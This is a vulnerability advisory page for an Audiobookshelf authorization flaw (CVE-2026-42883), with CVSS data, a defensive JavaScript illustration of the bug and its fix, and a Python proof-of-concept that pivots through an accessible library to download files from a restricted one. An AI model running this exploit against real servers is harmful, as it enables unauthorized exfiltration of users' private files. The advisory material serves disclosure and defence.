Security Vulnerability Report
CVE-2026-42883 CVSS 6.5 MEDIUM

CVE-2026-42883

Published: 2026-05-11 20:25:45
Last Modified: 2026-05-11 20:25:45

Description

Audiobookshelf is a self-hosted audiobook and podcast server. Prior to 2.32.2, the GET /api/libraries/:id/download endpoint validates that the requesting user has access to the library specified in the URL path, but fetches downloadable items solely by attacker-provided IDs without constraining them to that library. An authenticated user with download permission and access to any one library can exfiltrate the full file contents of items belonging to any other library, including libraries they are explicitly denied access to. This vulnerability is fixed in 2.32.2.
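To make the authorization gap concrete, the following is an added illustration of the CWE-863 pattern described above, not code from the Audiobookshelf project. The item ids, library ids, user record and handler names are constructed for the example; the only thing taken from the advisory is the shape of the bug: the library in the URL path is authorized, but the items are then fetched by caller-supplied ids with no tie back to that library.

```javascript
// Added illustration of the CWE-863 pattern in CVE-2026-42883, not code from the
// Audiobookshelf project. All ids, the user record and the handler names below
// are constructed for the example.

// Constructed fixture: one item in the library the user may see, one in a
// library the user is denied.
const ITEMS = [
  { id: "li_alpha",  libraryId: "lib_01", path: "/audiobooks/alpha.m4b" },
  { id: "li_secret", libraryId: "lib_02", path: "/audiobooks/secret.m4b" },
];

// Constructed low-privilege user: has the download permission but is granted
// access to lib_01 only.
const LOW_PRIV_USER = {
  id: "u1",
  permissions: { download: true },
  librariesAccessible: ["lib_01"],
};

function canAccessLibrary(user, libraryId) {
  return user.librariesAccessible.includes(libraryId);
}

// Vulnerable shape: the library named in the URL path is authorized, but the
// items are then looked up by the caller-supplied ids alone, so an id from any
// other library is served as long as it exists.
function downloadVulnerable(user, libraryId, requestedIds) {
  if (!user.permissions.download) return { status: 403, files: [] };
  if (!canAccessLibrary(user, libraryId)) return { status: 403, files: [] };

  const items = requestedIds
    .map((id) => ITEMS.find((item) => item.id === id))
    .filter(Boolean);
  if (items.length === 0) return { status: 404, files: [] };
  return { status: 200, files: items.map((item) => item.path) };
}

// Fixed shape: the lookup itself is scoped to the authorized library, so an id
// belonging to another library simply does not resolve. Any id that fails to
// resolve within that library fails the whole request, which also avoids
// leaking whether a foreign id exists.
function downloadFixed(user, libraryId, requestedIds) {
  if (!user.permissions.download) return { status: 403, files: [] };
  if (!canAccessLibrary(user, libraryId)) return { status: 403, files: [] };

  const items = requestedIds
    .map((id) => ITEMS.find((item) => item.id === id && item.libraryId === libraryId))
    .filter(Boolean);
  if (items.length === 0 || items.length !== requestedIds.length) {
    return { status: 404, files: [] };
  }
  return { status: 200, files: items.map((item) => item.path) };
}

// Walk-through: the constructed user pivots through lib_01 to reach an item
// that lives in lib_02.
console.log("vulnerable:", downloadVulnerable(LOW_PRIV_USER, "lib_01", ["li_secret"]));
console.log("fixed:     ", downloadFixed(LOW_PRIV_USER, "lib_01", ["li_secret"]));
console.log("legit:     ", downloadFixed(LOW_PRIV_USER, "lib_01", ["li_alpha"]));
```

In a database-backed handler the equivalent of `downloadFixed` is to put the constraint in the query (the ids *and* the library id in the WHERE clause) rather than filtering after the fetch, so there is no window in which an out-of-library row is ever loaded. The same scoping belongs on every endpoint that takes item ids alongside a library in the path, not just the download route.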

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Weakness
CWE-863 (Incorrect Authorization)

Configurations (Affected Products)

No CPE configuration data is available from NVD yet (record status: Received). Affected versions per the advisory:

Audiobookshelf < 2.32.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration
target_host = "http://localhost:13378"

# Attacker's credentials (low-privilege user with access to Library A)
auth_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."

# Headers
headers = {
    "Authorization": f"Bearer {auth_token}",
    "Content-Type": "application/json"
}

# Scenario: the attacker has access to library 'lib_01' but wants to download a
# file from restricted library 'lib_02'. The endpoint checks access to 'lib_01'
# but fetches the file by its direct ID.

# The ID of the library the attacker has access to
accessible_library_id = "lib_01"

# The ID of the target file belonging to a restricted library
# (obtained via enumeration or guessing)
target_file_id = "file_secret_id_in_lib_02"

# Construct the malicious URL: the server checks access to 'accessible_library_id',
# then fetches 'target_file_id' without checking that it belongs to that library
exploit_url = f"{target_host}/api/libraries/{accessible_library_id}/download"
payload = {
    "id": target_file_id,  # The vulnerable parameter
    "type": "book"
}

print(f"[+] Attempting to download file {target_file_id} using library {accessible_library_id} as a pivot...")

try:
    response = requests.get(exploit_url, headers=headers, params=payload, stream=True)
    if response.status_code == 200:
        print("[+] Exploit successful! File content received.")
        filename = f"exfiltrated_{target_file_id}.m4b"
        with open(filename, "wb") as f:
            for chunk in response.iter_content(chunk_size=8192):
                f.write(chunk)
        print(f"[+] File saved as {filename}")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

https://github.com/advplyr/audiobookshelf/security/advisories/GHSA-6rvg-w3f5-9gq5

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42883", "sourceIdentifier": "[email protected]", "published": "2026-05-11T20:25:44.593", "lastModified": "2026-05-11T20:25:44.593", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Audiobookshelf is a self-hosted audiobook and podcast server. Prior to 2.32.2, the GET /api/libraries/:id/download endpoint validates that the requesting user has access to the library specified in the URL path, but fetches downloadable items solely by attacker-provided IDs without constraining them to that library. An authenticated user with download permission and access to any one library can exfiltrate the full file contents of items belonging to any other library, including libraries they are explicitly denied access to. This vulnerability is fixed in 2.32.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/advplyr/audiobookshelf/security/advisories/GHSA-6rvg-w3f5-9gq5", "source": "[email protected]"}]}}